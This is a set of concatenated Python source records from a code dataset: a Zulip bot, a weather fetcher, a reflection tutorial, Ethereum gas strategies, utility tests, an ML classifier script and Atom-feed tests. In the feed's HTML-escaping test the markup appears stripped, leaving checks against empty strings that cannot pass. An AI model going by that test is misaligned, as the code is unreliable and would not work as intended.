dd.MM.yyyy hh:mm-hh:mm event_name\". Например,\n\"запись 504 11.09.2020 9:00-10:20 лекция\"\n'''\n\n\nclass BotHandler(object):\n def __init__(self):\n self.client = zulip.Client(config_file=\"zuliprc\")\n\n def get_msg(self, msg):\n if msg[\"sender_email\"] != \"hse-bot@chat.miem.hse.ru\":\n self.check_msg(msg)\n\n def send_msg(self, msg, content):\n if msg[\"type\"] == 'private':\n request = {\n \"type\": \"private\",\n \"to\": msg[\"sender_email\"],\n \"content\": content\n }\n self.client.send_message(request)\n elif msg[\"type\"] == 'stream':\n request = {\n \"type\": \"stream\",\n \"to\": msg[\"display_recipient\"],\n \"topic\": msg[\"subject\"],\n \"content\": content\n }\n self.client.send_message(request)\n\n def send_private_msg(self, email='', content=''):\n request = {\n \"type\": \"private\",\n \"to\": email,\n \"content\": content\n }\n self.client.send_message(request)\n\n def check_msg(self, msg):\n words = msg[\"content\"].lower().split()\n if (msg[\"type\"] == 'private' or '@**Service Bot**' in msg[\"content\"]) \\\n and msg['sender_full_name'] != 'Service Bot':\n if \"помощь\" in words:\n if \"расписание\" in words:\n self.send_msg(msg, HELP_RUZ_MESSAGE)\n elif \"запись\" in words:\n self.send_msg(msg, HELP_NVR_MESSAGE)\n else:\n self.send_msg(msg, HELLO_MESSAGE)\n elif \"расписание\" in words:\n self.send_msg(msg,\n timetable.check_msg(msg[\"sender_email\"], msg[\"content\"], msg[\"sender_id\"]))\n elif \"привет\" in words:\n self.send_msg(msg, HELLO_MESSAGE)\n elif \"запись\" in words:\n self.send_msg(msg,\n record.check_msg(msg[\"sender_email\"], msg[\"content\"]))\n elif \"список\" in words and \"аудиторий\" in words:\n rooms = ', '.join(record.get_rooms())\n self.send_msg(msg, 'Доступные аудитории:\\n' + rooms)\n else:\n self.send_msg(msg, \"Не знаю что и ответить :(. \\n\"\n \"Чтобы узнать какие у меня есть команды, напиши 'Помощь'\")\n\n\nif __name__ == '__main__':\n Bot = BotHandler()\n Bot.client.call_on_each_message(Bot.get_msg)\n handler_class = BotHandler\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503732750","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os, time, random\nimport urllib.request\nimport logging\nimport json\nfrom weather_keys import *\nfrom config import *\nimport urllib, json\n\n\nbase_url = \"http://dataservice.accuweather.com/forecasts/v1/daily/1day/\"\nquery = \"?language=en-US&details=true&apikey=\"\n\nclass Config():\n def __init__(self):\n self.weather = {}\n\n \ndef getWeather(config, location):\n\n def FtoC(input):\n return round( ((input - 32) * 5.0/9.0), 0)\n\n #weather_key = \"hogehoge!\"\n #config = Config()\n #config.weather = {}\n config.weather = {}\n url = base_url + str(location) + query + weather_key\n logging.debug(\"Starting getWeather\")\n while True:\n temp = {};\n i = 2; result = None\n t = time.time()\n if os.path.isfile(str(location) + \".json\") and \\\n time.time() - os.path.getmtime(str(location) + \".json\") < WEATHER_INTERVAL:\n logging.debug(str(location) + \": The file already exists!\")\n with open(str(location) + \".json\", 'r') as f:\n result = f.read()\n while not result:\n logging.debug(\"No File found for weather!\")\n try:\n time.sleep(random.randint(2,10))\n result = urllib.request.urlopen(url).read().decode('utf8')\n t = time.time()\n with open (str(location) + \".json\", 'w') as f:\n f.write(result)\n logging.debug(\"Weather info updated!!\")\n except Exception as e:\n logging.debug(\"error occured!: \" + str(e))\n #print(\"error occured!: \" + str(e))\n i = i **2; time.sleep(i)\n #if time.time() - t > 14400: # No update for 4hrs\n # config.weather = {}\n\n \n data = json.loads(result)\n\n # Headline\n temp[\"headline\"] = data[\"Headline\"][\"Text\"]\n temp[\"time\"] = data[\"Headline\"][\"EffectiveDate\"]\n temp[\"time\"] = temp[\"time\"][:-3] + temp[\"time\"][-2:]\n\n # DailyForecasts\n forecasts = data[\"DailyForecasts\"][0]\n\n # - Sun\n data_sun = forecasts[\"Sun\"]\n temp[\"rise\"] = int(data_sun[\"EpochRise\"])\n temp[\"set\"] = int(data_sun[\"EpochSet\"])\n\n # - Temperature\n data_tempe = forecasts[\"Temperature\"]\n # - Minimum\n minf = int(data_tempe[\"Minimum\"][\"Value\"])\n temp[\"min\"] = (minf, FtoC(minf))\n # - Maximum\n maxf = int(data_tempe[\"Maximum\"][\"Value\"])\n temp[\"max\"] = (maxf, FtoC(maxf))\n\n # - RealFeelTemperature\n data_rftempe = forecasts[\"RealFeelTemperature\"]\n # - Minimum\n minf = int(data_rftempe[\"Minimum\"][\"Value\"])\n temp[\"rfmin\"] = (minf, FtoC(minf))\n # - Maximum\n maxf = int(data_rftempe[\"Maximum\"][\"Value\"])\n temp[\"rfmax\"] = (maxf, FtoC(maxf))\n\n # - Day\n data_day = forecasts[\"Day\"]\n temp[\"dicon\"] = data_day[\"Icon\"]\n temp[\"dphrase\"] = data_day[\"LongPhrase\"]\n temp[\"dpreciption\"] = data_day[\"PrecipitationProbability\"]\n \n # - Night\n data_day = forecasts[\"Night\"]\n temp[\"nicon\"] = data_day[\"Icon\"]\n temp[\"nphrase\"] = data_day[\"LongPhrase\"]\n temp[\"npreciption\"] = data_day[\"PrecipitationProbability\"]\n\n # Re-link config.weather\n config.weather[location] = temp \n\n logging.debug(\"weather info updated: \" + str(config.weather))\n\n # Sleep\n time.sleep(WEATHER_INTERVAL)\n #time.sleep(5)\n \nif __name__ == '__main__':\n getWeather(338668)\n","sub_path":"lib/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"395419692","text":"\"\"\"Copyright 2017 David Donahue. Stores global paths and constants.\"\"\"\nimport os\n\nDATA_DIR = './data'\nCORNELL_MOVIE_DIR = os.path.join(DATA_DIR, 'cornell movie-dialogs corpus/')\n\nCORNELL_MOVIE_LINES_FILE = os.path.join(CORNELL_MOVIE_DIR, 'movie_lines.txt')\nCORNELL_MOVIE_CONVERSATIONS_FILE = os.path.join(CORNELL_MOVIE_DIR, 'movie_conversations.txt')\nMS_MARCO_TRAIN_SET = os.path.join(DATA_DIR, 'ms_marco/train_v1.1.json')\nSQUAD_TRAIN_SET = os.path.join(DATA_DIR, 'squad/train-v1.1.json')\nBASELINE_MODEL_SAVE_DIR = os.path.join(DATA_DIR, 'baseline_models/')\nCHAT_MODEL_SAVE_DIR = os.path.join(DATA_DIR, 'chat_models/')\nGLOVE_200_FILE = os.path.join(DATA_DIR, 'glove.twitter.27B/glove.twitter.27B.200d.txt')\nVALIDATION_PREDICTIONS_FILE = os.path.join(DATA_DIR, 'predictions.pkl')\nSUBMISSION_PREDICTIONS_FILE = os.path.join(DATA_DIR, 'final_predictions.json')\n\n# CONSTANTS\nMAX_QUESTION_WORDS = 30\nMAX_ANSWER_WORDS = 10\nMAX_CONTEXT_WORDS = 200\nGLOVE_EMB_SIZE = 300\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"111729488","text":"# -*- coding: utf-8 -*-\r\n# -*- author: JeremySun -*-\r\n# -*- dating: 20/1/24 -*-\r\n\r\n\"\"\"\r\n通过字符串访问到对象的属性\r\n\"\"\"\r\n\r\n\r\nclass People(object):\r\n def __init__(self, name, age):\r\n self.name = name\r\n self.age = age\r\n\r\n def talk(self):\r\n print('{name} is talking'.format(name=self.name))\r\n\r\n\r\np = People(name='egon', age=18)\r\n# 访问属性\r\nprint(p.name)\r\nprint(p.talk)\r\n# 通过字符串映射到对象的属性,判断字典里面有没有属性name,有为True\r\nprint(hasattr(p, 'name')) # 查看p.name,本质上是p.__dict__['name']\r\n# 拿到对象属性\r\nprint(getattr(p, 'name')) # None表示如果没有这个属性不会报错\r\nprint(getattr(p, 'sex', None)) # 如果没有这个属性就返回None\r\n# 修改属性\r\nsetattr(p, 'sex', 'male') # p.sex='male'\r\nprint(p.sex)\r\n# 删除\r\nprint(p.__dict__) # {'name': 'egon', 'age': 18, 'sex': 'male'}\r\ndelattr(p, 'age') # del p.age\r\nprint(p.__dict__) # {'name': 'egon', 'sex': 'male'}\r\n\r\n# 对类同样适用\r\nprint(getattr(People, 'country', None))\r\n\r\n\r\n# 反射的应用\r\nclass Service(object):\r\n def run(self):\r\n while True:\r\n cmd = input('>>: '.strip()) # cmd = 'get a.txt'\r\n cmds = cmd.split()\r\n if hasattr(self, cmds[0]):\r\n func = getattr(self, cmds[0]) # 这里的getattr拿到是绑定党发\r\n func(cmds) # 加括号调用\r\n\r\n def get(self, cmds):\r\n print('get ...', cmds)\r\n\r\n def put(self, cmds):\r\n print('put ...', cmds)\r\n\r\n\r\nobj = Service()\r\nobj.run()","sub_path":"Class Learn/24 反射.py","file_name":"24 反射.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"164068369","text":"from brownie import network\nfrom brownie.network.gas.strategies import (\n GasNowStrategy,\n ExponentialScalingStrategy,\n SimpleGasStrategy,\n)\nfrom brownie.network import gas_price\nfrom brownie import Wei\nfrom helpers.network import network_manager\n\nexponential_scaling_config = {\n \"initial_gas_price\": \"100 gwei\",\n \"max_gas_price\": \"1000 gwei\",\n}\n\nbsc_static_price = Wei(\"10 gwei\")\n\n\nclass StaticGasStrategy(SimpleGasStrategy):\n def __init__(self, price) -> None:\n self.price = price\n super().__init__()\n\n def get_gas_price(self) -> int:\n return self.price\n\n\nclass GasStrategies:\n def __init__(self):\n self.standard = GasNowStrategy(\"standard\")\n self.fast = GasNowStrategy(\"fast\")\n self.rapid = GasNowStrategy(\"rapid\")\n self.bsc_static = StaticGasStrategy(bsc_static_price)\n\n print(self.fast.get_gas_price())\n\n self.exponentialScaling = ExponentialScalingStrategy(\n initial_gas_price=self.standard.get_gas_price(),\n max_gas_price=Wei(exponential_scaling_config[\"max_gas_price\"]),\n time_duration=120,\n )\n\n self.exponentialScalingFast = ExponentialScalingStrategy(\n initial_gas_price=self.fast.get_gas_price(),\n max_gas_price=Wei(exponential_scaling_config[\"max_gas_price\"]),\n time_duration=60,\n )\n\n def set_default(self, strategy):\n gas_price(strategy)\n\n def set_default_for_active_chain(self):\n chain = network_manager.get_active_network()\n if chain == \"eth\":\n self.set_default(self.exponentialScaling)\n elif chain == \"bsc\":\n self.set_default(self.bsc_static)\n\n\ngas_strategies = GasStrategies()\ngas_strategies.set_default(gas_strategies.fast)\n","sub_path":"helpers/gas_utils.py","file_name":"gas_utils.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"196108475","text":"# -*- coding: utf-8 -*-\n\nfrom enum import Enum\nfrom os import path as osp\nfrom pyuginx import util\nfrom unittest import TestCase\nimport re\nimport textwrap\n\n\nclass UtilTest(TestCase):\n\n def test_is_list(self):\n self.assertTrue(util.is_list([1, 2, 3]))\n self.assertTrue(util.is_list((1, 2, 3)))\n self.assertFalse(util.is_list('123'))\n self.assertFalse(util.is_list(123))\n self.assertFalse(util.is_list(None))\n\n def test_cached_property(self):\n\n class Config(object):\n\n def __init__(self):\n self._app_name = 'pyuginx'\n\n @util.cached_property\n def app_name(self):\n return self._app_name\n\n config = Config()\n self.assertEqual(config.app_name, 'pyuginx')\n config._app_name = 'pyuginx2'\n self.assertEqual(config.app_name, 'pyuginx')\n\n def test_dedent(self):\n ddt = util.dedent('''\n Line 1\n Line 2\n ''')\n dd = textwrap.dedent('''\\\n Line 1\n Line 2''')\n self.assertEqual(dd, ddt)\n\n def test_dedent_newlines(self):\n ddt = util.dedent('''\n\n Line 1\n Line 2\n\n ''')\n dd = textwrap.dedent('''\n Line 1\n Line 2\n ''')\n self.assertEqual(dd, ddt)\n\n def test_format(self):\n template = '''\n Hi {{ first_name }} {{ last_name }}!\n '''\n exp_text = '''\n Hi Foo Bar!\n '''\n text = util.format(template, {'first_name': 'Foo', 'last_name': 'Bar'})\n self.assertEqual(exp_text, text)\n\n def test_format_none_str(self):\n template = '''\n int: {{ int }}\n '''\n exp_text = '''\n int: 100\n '''\n text = util.format(template, {'int': 100})\n self.assertEqual(exp_text, text)\n\n def test_format_no_value(self):\n self.assertRaises(KeyError, util.format, '{{x}}')\n\n def test_format_bad_variable(self):\n text = util.format('{{}} {{ }}')\n self.assertEqual(text, '{{}} {{ }}')\n\n def test_format_preserve_indentation(self):\n template = '''\n def x():\n y(\"\"\"{{a}}\"\"\", \"\"\"{{b}}\"\"\")\n '''\n exp_text = '''\n def x():\n y(\"\"\"one\n two\n three\"\"\", \"\"\"four\n five\n six\"\"\")\n '''\n text = util.format(template, {'a': 'one\\ntwo\\nthree', 'b': 'four\\nfive\\nsix'})\n self.assertEqual(exp_text, text)\n\n def test_parse_command(self):\n cmdlist = ['chmod', '600', 'server.key']\n self.assertEqual(util.parse_command('chmod 600 server.key'), cmdlist)\n self.assertEqual(util.parse_command(cmdlist), cmdlist)\n\n def test_format_command(self):\n cmdline = 'chmod 600 server.key'\n self.assertEqual(util.format_command(['chmod', 600, 'server.key']), cmdline)\n self.assertEqual(util.format_command(cmdline), cmdline)\n\n def test_basename(self):\n self.assertEqual(util.basename('dir/foobar'), 'foobar')\n self.assertEqual(util.basename('foobar'), 'foobar')\n self.assertEqual(util.basename('./foobar'), 'foobar')\n self.assertEqual(util.basename('../foobar'), 'foobar')\n self.assertEqual(util.basename(''), '')\n\n def test_temp_dir(self):\n with util.temp_dir() as dirname:\n self.assertTrue(osp.isdir(dirname))\n\n self.assertFalse(osp.exists(dirname))\n\n def test_temp_dir_fixed_name(self):\n with util.temp_dir('pyuginx') as dirname:\n self.assertEqual(osp.basename(dirname), 'pyuginx')\n self.assertTrue(osp.isdir(dirname))\n\n self.assertFalse(osp.exists(dirname))\n\n def test_temp_file(self):\n with util.temp_file() as filename:\n self.assertTrue(osp.isfile(filename))\n\n self.assertFalse(osp.exists(filename))\n\n def test_read_write_file(self):\n with util.temp_file() as filename:\n util.write_file(filename, 'content')\n self.assertEqual(util.read_file(filename), 'content')\n\n def test_parse_config(self):\n config = util.parse_config('''\n [section]\n name=value\n ''')\n self.assertEqual(config['section']['name'], 'value')\n\n def test_config_str(self):\n config = util.parse_config('''\n [server]\n server_name = localhost\n # Number of worker processes\n workers = 2\n\n [database]\n host = localhost\n db_name = pyuginx\n\n [misc]\n ''')\n exp_config_str = util.dedent('''\n [server]\n server_name = localhost\n workers = 2\n\n [database]\n host = localhost\n db_name = pyuginx\n\n [misc]\n ''')\n self.assertEqual(exp_config_str, str(config))\n\n def test_config_str_empty(self):\n config = util.parse_config('')\n self.assertEqual(str(config), '')\n\n def test_config_update(self):\n config = util.parse_config('''\n [server]\n server_name = localhost\n port = 80\n ''')\n config.update(util.parse_config('''\n [server]\n server_name =\n port = 8080\n\n [google]\n search_url=https://www.google.com\n\n [empty]\n '''))\n exp_config_str = util.dedent('''\n [server]\n server_name = localhost\n port = 8080\n\n [google]\n search_url = https://www.google.com\n\n [empty]\n ''')\n self.assertEqual(exp_config_str, str(config))\n\n def test_to_enum(self):\n\n class Color(Enum):\n red = 1\n green = 2\n blue = 3\n\n self.assertEqual(util.to_enum(Color, None), None)\n self.assertEqual(util.to_enum(Color, 2), Color.green)\n self.assertEqual(util.to_enum(Color, 'blue'), Color.blue)\n self.assertEqual(util.to_enum(Color, Color.red), Color.red)\n\n self.assertRaisesRegex(\n ValueError,\n re.escape('Invalid Color value 0, must be one of [1, 2, 3]'),\n util.to_enum, Color, 0)\n\n self.assertRaisesRegex(\n ValueError,\n re.escape(\"Invalid Color name 'purple', must be one of ['red', 'green', 'blue']\"),\n util.to_enum, Color, 'purple')\n\n self.assertRaisesRegex(\n ValueError,\n 'not a valid',\n util.to_enum, Color, self)\n","sub_path":"pyuginx-3/pyuginx/testutil.py","file_name":"testutil.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"622638693","text":"from sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.externals import joblib\nfrom imblearn.over_sampling import SMOTE, ADASYN, RandomOverSampler\n\nimport os.path as path\nimport numpy as np\nimport pandas as pd\nimport timeit\n\ndef gradientBoosting(state=42):\n gradientBoostingClassifier = GradientBoostingClassifier(\n loss='deviance', \n learning_rate=0.1, \n n_estimators=100, \n subsample=1.0, \n criterion='friedman_mse', \n min_samples_split=2, \n min_samples_leaf=1, \n min_weight_fraction_leaf=0.0, \n max_depth=100, \n min_impurity_decrease=0.0, \n min_impurity_split=None, \n init=None, \n random_state=state, \n max_features=None, \n verbose=0, \n max_leaf_nodes=None, \n warm_start=False, \n presort='auto'\n )\n return (gradientBoostingClassifier, \"Gradient Boosting\")\n\ndef randomForest(state=42):\n randomForestClassifier = RandomForestClassifier(\n n_estimators=50, \n criterion='entropy', \n max_depth=None, \n min_samples_split=5, \n min_samples_leaf=5, \n min_weight_fraction_leaf=0.0, \n max_features=None, \n max_leaf_nodes=None, \n min_impurity_decrease=0.0, \n min_impurity_split=None, \n bootstrap=True, \n oob_score=False, \n n_jobs=1, \n random_state=state, \n verbose=0, \n warm_start=False, \n class_weight=None\n )\n return (randomForestClassifier, \"Random Forest\")\n\ndef svm(state=42):\n linearSVC = LinearSVC(\n penalty='l2', \n loss='squared_hinge', \n dual=True, \n tol=0.0001, \n C=1.0, \n multi_class='ovr', \n fit_intercept=True, \n intercept_scaling=1, \n class_weight=None, \n verbose=0, \n random_state=state, \n max_iter=1000\n )\n return (linearSVC, \"SVM\")\n\ndef mlp(state=42):\n mlpClassifier = MLPClassifier(\n hidden_layer_sizes=5,\n activation='tanh',\n batch_size=100,\n learning_rate='adaptive',\n max_iter=1000,\n random_state=state,\n # verbose=True,\n early_stopping=False,\n tol=10,\n )\n return (mlpClassifier,\"MLP\") \n\ndef dividir(answerAll=42):\n np.random.seed(answerAll)\n\n data_set = pd.read_csv('data/TRN',sep='\\t')\n data_set.drop_duplicates(inplace=True) # Remove exemplos repetidos\n\n # Também convertemos os dados para arrays ao invés de DataFrames\n # X = data_set.iloc[:, :-3].values\n # y = data_set.iloc[:, -1].values\n\n # Separando features e target para criação do modelo\n X = data_set.drop(['INDEX', 'IND_BOM_1_1', 'IND_BOM_1_2'], axis=1)\n y = data_set['IND_BOM_1_1']\n\n \n # Treino: 50%, Validação: 25%, Teste: 25%\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1/4, \n random_state=answerAll, stratify=y)\n #X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=1/3, \n # random_state=answerAll, stratify=y_train)\n\n # train_test_split(y, shuffle=False)\n\n # X_resampled, y_resampled = SMOTE(kind='borderline1').fit_sample(X_train, y_train)\n\n ros = RandomOverSampler(random_state=answerAll)\n X_resampled, y_resampled = ros.fit_sample(X_train, y_train)\n\n return (X_resampled, y_resampled, X_test, y_test)\n\n\ndef metricas(classifier, X_test, y_test, name = \"Classificador\"):\n \n score = classifier.score(X_test, y_test)\n accuracy = cross_val_score(classifier, X_test, y_test, scoring='accuracy')\n average_precision = cross_val_score(classifier, X_test, y_test, scoring='average_precision')\n precision = cross_val_score(classifier, X_test, y_test, scoring='precision')\n recall = cross_val_score(classifier, X_test, y_test, scoring='recall')\n roc_auc = cross_val_score(classifier, X_test, y_test, scoring='roc_auc')\n \n score = f'Score: {score}'\n accuracy = f'Accuracy: {accuracy}'\n average_precision = f'average_precision: {average_precision}'\n precision = f'precision: {precision}'\n recall = f'recall: {recall}'\n roc_auc = f'roc_auc: {roc_auc}'\n\n return [score, accuracy, average_precision, precision, recall, roc_auc]\n\n\ndef saveLog(classifier, metricas, file_name, time, name):\n \n name = \"log/\" + name + \".txt\"\n texto = []\n try:\n arquivo = open(name, 'r')\n texto = arquivo.readlines()\n arquivo = open(name, 'w')\n except FileNotFoundError:\n arquivo = open(name, 'w')\n \n texto.append(\"Rede treinada:\\n\")\n texto.append(file_name)\n texto.append(\"\\n\\nTempo de treinamento:\\n\")\n texto.append(\"{0:.2f}s\".format(time))\n texto.append(\"\\n\\nConfiguração do classificador:\\n\")\n texto.append(classifier.__str__())\n texto.append(\"\\n\\nMetricas do classificador:\\n\")\n \n for metrica in metricas:\n texto.append(metrica+\"\\n\")\n\n texto.append(\"---------------------------------------------------------\\n\\n\")\n\n # escrever no arquivo\n arquivo.writelines(texto)\n arquivo.close()\n\ndef saveModel(classifier, name = \"Classificador\"):\n\n name = \"log/\" + name\n i = 0\n while path.isfile(name + '_' + str(i) + '.pkl'):\n i = i + 1\n\n name_new = name + \"_\" + str(i) + \".pkl\"\n joblib.dump(classifier, name_new)\n return name_new\n\ndef main():\n\n answerAll = 42\n start = timeit.default_timer()\n\n # divide os dados de entrada\n X_train, y_train, X_test, y_test = dividir(answerAll)\n\n loadModel = False\n\n if loadModel:\n # classificadores salvos\n name = \"MLP\"\n path = \"log/MLP_0.pkl\"\n classifier = joblib.load(path) \n\n metricas_list = metricas(classifier, X_test, y_test, name)\n print(\"Metricas do classificador: \" + name)\n for metrica in metricas_list:\n print(metrica)\n\n stop = timeit.default_timer()\n print(\"Tempo de execução: {0:.2f}s\".format(stop - start))\n else:\n \n # classificadores\n classifier, name = gradientBoosting(answerAll)\n # classifier, name = randomForest(answerAll)\n # classifier, name = svm(answerAll)\n # classifier, name = mlp(answerAll)\n \n # treinar o modelo\n classifier.fit(X_train, y_train)\n\n # printar os resultados das metricas\n metricas_list = metricas(classifier, X_test, y_test, name)\n print(\"Metricas do classificador: \" + name)\n for metrica in metricas_list:\n print(metrica)\n\n name_model = saveModel(classifier, name)\n stop = timeit.default_timer()\n time = stop - start\n print(\"Tempo de execução: {0:.2f}s\".format(time))\n saveLog(classifier, metricas_list, name_model, time, name)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"exemplo.py","file_name":"exemplo.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"570709632","text":"# -*- coding: utf-8 -*-\n# pylint: disable=protected-access\n\"\"\"Unit tests for h/atom_feed.py.\"\"\"\nimport datetime\n\nimport mock\n\nfrom h import atom_feed\nfrom . import factories\n\n\ndef _mock_annotation_url_function():\n annotation_url = mock.Mock()\n annotation_url.return_value = \"http://example.com/annotations/12345\"\n return annotation_url\n\n\ndef _mock_annotation_api_url_function():\n annotation_url = mock.Mock()\n annotation_url.return_value = \"http://example.com/annotations/12345.json\"\n return annotation_url\n\n\ndef test_entry_id():\n \"\"\"Entry IDs should be tag URIs based on domain, day and annotation ID.\"\"\"\n annotation = factories.Annotation(\n id=\"12345\",\n created=datetime.datetime(year=2015, month=3, day=19).isoformat())\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"id\"] == \"tag:example.com,2015-03-19:12345\"\n\n\ndef test_entry_author_name():\n \"\"\"Entries should have an author name based on the annotation user name.\"\"\"\n annotation = factories.Annotation(username=\"jon\")\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"author\"][\"name\"] == \"jon\"\n\n\ndef test_entry_title():\n \"\"\"Entries should have a title based on the annotated document's title.\"\"\"\n title = \"My Test Document\"\n annotation = factories.Annotation(document_title=title)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"title\"] == title\n\n\ndef test_entry_published_date():\n datestring = \"2015-03-18T12:44:17.551191+00:00\"\n annotation = factories.Annotation(created=datestring)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"published\"] == datestring\n\n\ndef test_entry_updated_date():\n datestring = \"2015-03-19T11:27:17.551191+00:00\"\n annotation = factories.Annotation(updated=datestring)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert entry[\"updated\"] == datestring\n\n\ndef test_entry_content_includes_selected_text():\n \"\"\"The entry content should include the selected text in a blockquote.\"\"\"\n text = \"Some annotated text from a web page\"\n annotation = factories.Annotation(exact_text=text)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert (\n \"<blockquote>{text}</blockquote>\".format(text=text)\n in entry[\"content\"])\n\n\ndef test_entry_content_includes_annotation_text():\n \"\"\"The entry content should include the annotation note.\"\"\"\n text = \"A test annotation\"\n annotation = factories.Annotation(text=text)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n assert text in entry[\"content\"]\n\n\ndef test_entry_content_is_escaped():\n \"\"\"'&', '<' and '>' should be escaped in entry contents.\"\"\"\n text = \"An annotation with HTML in it, Ŷ\"\n exact_text = \"Some web page text ţ\"\n annotation = factories.Annotation(text=text, exact_text=exact_text)\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n for s in [\"\", \"\", \"\", \"\", \"Ŷ\", \"ţ\"]:\n assert s not in entry[\"content\"]\n\n\ndef test_html_link():\n \"\"\"Entries should have links to their HTML representation.\"\"\"\n annotation = factories.Annotation()\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n entry = feed[\"entries\"][0]\n matching_links = [l for l in entry[\"links\"]\n if l[\"href\"] == \"http://example.com/annotations/12345\"]\n assert len(matching_links) == 1\n matching_link = matching_links[0]\n assert matching_link[\"rel\"] == \"alternate\"\n assert matching_link[\"type\"] == \"text/html\"\n\n\ndef test_json_link():\n \"\"\"Entries should have links to their JSON representation.\"\"\"\n annotation = factories.Annotation()\n\n feed = atom_feed._feed_from_annotations(\n [annotation], atom_url=None,\n annotation_url=_mock_annotation_url_function(),\n annotation_api_url=_mock_annotation_api_url_function())\n\n entry = feed[\"entries\"][0]\n matching_links = [\n l for l in entry[\"links\"]\n if l[\"href\"] == \"http://example.com/annotations/12345.json\"]\n assert len(matching_links) == 1\n matching_link = matching_links[0]\n assert matching_link[\"rel\"] == \"alternate\"\n assert matching_link[\"type\"] == \"application/json\"\n\n\ndef test_feed_entries():\n \"\"\"Feeds should contain the right entries in the right order.\"\"\"\n annotations = [factories.Annotation(random_number=n) for n in range(1, 4)]\n\n feed = atom_feed._feed_from_annotations(\n annotations, atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert [entry[\"title\"] for entry in feed[\"entries\"]] == [\n \"Example Document 1\", \"Example Document 2\", \"Example Document 3\"]\n\n\ndef test_feed_id():\n \"\"\"The feed should use its own URL as its id.\"\"\"\n atom_url = \"http://example.com/annotations.atom\"\n\n feed = atom_feed._feed_from_annotations(\n annotations=factories.Annotation.create_batch(3),\n atom_url=atom_url,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"id\"] == atom_url\n\n\ndef test_feed_title():\n \"\"\"A custom title should be used as the feed title if given.\"\"\"\n feed = atom_feed._feed_from_annotations(\n title=\"My Custom Feed Title\",\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"title\"] == \"My Custom Feed Title\"\n\n\ndef test_default_feed_title():\n \"\"\"It should fall back to the default feed title if none is given.\"\"\"\n feed = atom_feed._feed_from_annotations(\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"title\"] == \"Hypothesis Stream\"\n\n\ndef test_feed_subtitle():\n \"\"\"A custom subtitle should be used as the feed subtitle if given.\"\"\"\n feed = atom_feed._feed_from_annotations(\n subtitle=\"My Custom Feed Subtitle\",\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"subtitle\"] == \"My Custom Feed Subtitle\"\n\n\ndef test_default_feed_subtitle():\n \"\"\"It should fall back to the default feed subtitle if none is given.\"\"\"\n feed = atom_feed._feed_from_annotations(\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"subtitle\"] == \"The Web. Annotated\"\n\n\ndef test_feed_self_link():\n \"\"\"The given atom_url should be used in a rel=\"self\" link.\"\"\"\n atom_url = \"http://www.example.com/annotations.atom\"\n feed = atom_feed._feed_from_annotations(\n annotations=factories.Annotation.create_batch(3),\n atom_url=atom_url,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"links\"][0][\"href\"] == atom_url\n assert feed[\"links\"][0][\"rel\"] == \"self\"\n assert feed[\"links\"][0][\"type\"] == \"application/atom+xml\"\n\n\ndef test_feed_html_link():\n \"\"\"The given html_url should be used in a rel=\"alternate\" link.\"\"\"\n html_url = \"http://www.example.com/annotations.html\"\n feed = atom_feed._feed_from_annotations(\n html_url=html_url,\n annotations=factories.Annotation.create_batch(3), atom_url=None,\n annotation_url=_mock_annotation_url_function())\n\n assert feed[\"links\"][1][\"href\"] == html_url\n assert 